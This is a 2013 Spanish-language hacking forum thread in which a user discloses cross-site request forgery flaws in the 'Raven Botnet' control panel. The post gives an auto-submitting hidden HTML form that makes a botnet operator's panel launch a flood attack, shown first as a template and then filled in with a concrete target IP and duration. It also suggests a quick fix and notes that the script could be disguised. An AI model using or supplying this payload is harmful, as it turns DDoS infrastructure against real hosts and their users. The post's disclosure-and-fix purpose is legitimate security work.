comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

CSRF Raven Botnet

  • 2 Respuestas
  • 2042 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Metadato

  • *
  • Underc0der
  • Mensajes: 59
  • Actividad:
    0%
  • Reputación 0
  • C / C++ & ASM
    • Ver Perfil
« en: Agosto 28, 2013, 01:55:33 pm »
Bueno pues hola a todos, he encontrado varios CSRF en la Raven Botnet, uno de ellos está en la parte del ataque:

Código: HTML5
  1.  
  2. <!-- CSRF Raven botnet, by Metadato -->
  3.  
  4. <body onload="document.csrf.submit();">
  5.         <form name="csrf" action="URL DONDE SE ENCUENTRA LA BOTNET/admin.php" method="post">
  6.                 <input type="hidden" name="target" value="HOST / IP QUE QUEREMOS ATACAR">
  7.                 <input type="hidden" name="time" value="TIEMPO EN SEGUNDOS">
  8.                 <input type="hidden" name="start" value="Attack!">
  9.         </form>
  10. </body>
  11. </html>
  12.  

Tendrían que editar todo lo que está en mayúscula, les mostraré el mismo código con un ejemplo:

Código: HTML5
  1.  
  2. <!-- CSRF Raven botnet, by Metadato -->
  3.  
  4. <body onload="document.csrf.submit();">
  5.         <form name="csrf" action="http://ravenbotnet.com/admin.php" method="post">
  6.                 <input type="hidden" name="target" value="173.194.34.248">
  7.                 <input type="hidden" name="time" value="500">
  8.                 <input type="hidden" name="start" value="Attack!">
  9.         </form>
  10. </body>
  11. </html>
  12.  

Tambien podrían ocultar este script con un pequeño fake, pero como la intención de este post es que se fixeen los CSRF's, no se lo mostraré.
Bueno tambien voy a ser sincero, ¿cuantos de ustedes muestran la url donde esta su Raven Botnet? Creo que ninguno, quien lo haga no es muy recomendable, y más en este caso.

Bueno si quieren solucionar esto de forma rápida (aunque algo chapucera), puede cambiar el nombre de admin.php por otro nombre y en el index.php, en la línea 10:

Código: PHP
  1. echo '<META HTTP-EQUIV="Refresh" CONTENT="0; URL=admin.php">';
  2.  

Le cambian el admin.php por el nombre que le pusieron y listo, también pueden montar la Raven de forma local. Espero que [Q]3rV[0] atienda este mensaje.

Un saludo  ;D
« Última modificación: Agosto 29, 2013, 07:04:38 am por Metadato »

Desconectado Réplica1

  • *
  • Underc0der
  • Mensajes: 35
  • Actividad:
    0%
  • Reputación 0
  • ... está historia se acabó.
    • Ver Perfil
    • @Pekador - Twitter
« Respuesta #1 en: Agosto 28, 2013, 02:33:37 pm »
Muy buen csrf, y el detalle de reportarlo muchisimo mejor.

Saludos!


Desconectado Metadato

  • *
  • Underc0der
  • Mensajes: 59
  • Actividad:
    0%
  • Reputación 0
  • C / C++ & ASM
    • Ver Perfil
« Respuesta #2 en: Agosto 29, 2013, 11:12:07 am »
Muy buen csrf, y el detalle de reportarlo muchisimo mejor.

Saludos!

Gracias Pekador, un saludo compa.
« Última modificación: Agosto 30, 2013, 10:32:44 am por Metadato »

 

¿Te gustó el post? COMPARTILO!



Webot Botnet - Frameshock

Iniciado por hdbreaker

Respuestas: 4
Vistas: 3361
Último mensaje Marzo 13, 2015, 12:44:48 pm
por n4pst3r
[Tutorial] Vulnerabilidad CSRF By ShadinessDark [Colaboracion de Zero Bits]

Iniciado por dracko.rx

Respuestas: 0
Vistas: 2005
Último mensaje Febrero 24, 2010, 03:24:51 pm
por dracko.rx
Ataques CSRF (Cross site request forgery)

Iniciado por M5f3r0

Respuestas: 11
Vistas: 6007
Último mensaje Septiembre 09, 2013, 03:48:08 pm
por M5f3r0
CSRF'S miarroba forums [By Pekador]

Iniciado por Réplica1

Respuestas: 1
Vistas: 1670
Último mensaje Agosto 27, 2013, 04:50:32 pm
por M5f3r0
[TUTORIAL] Como crear tu csrf

Iniciado por Windero

Respuestas: 4
Vistas: 2699
Último mensaje Agosto 24, 2013, 08:09:05 am
por Réplica1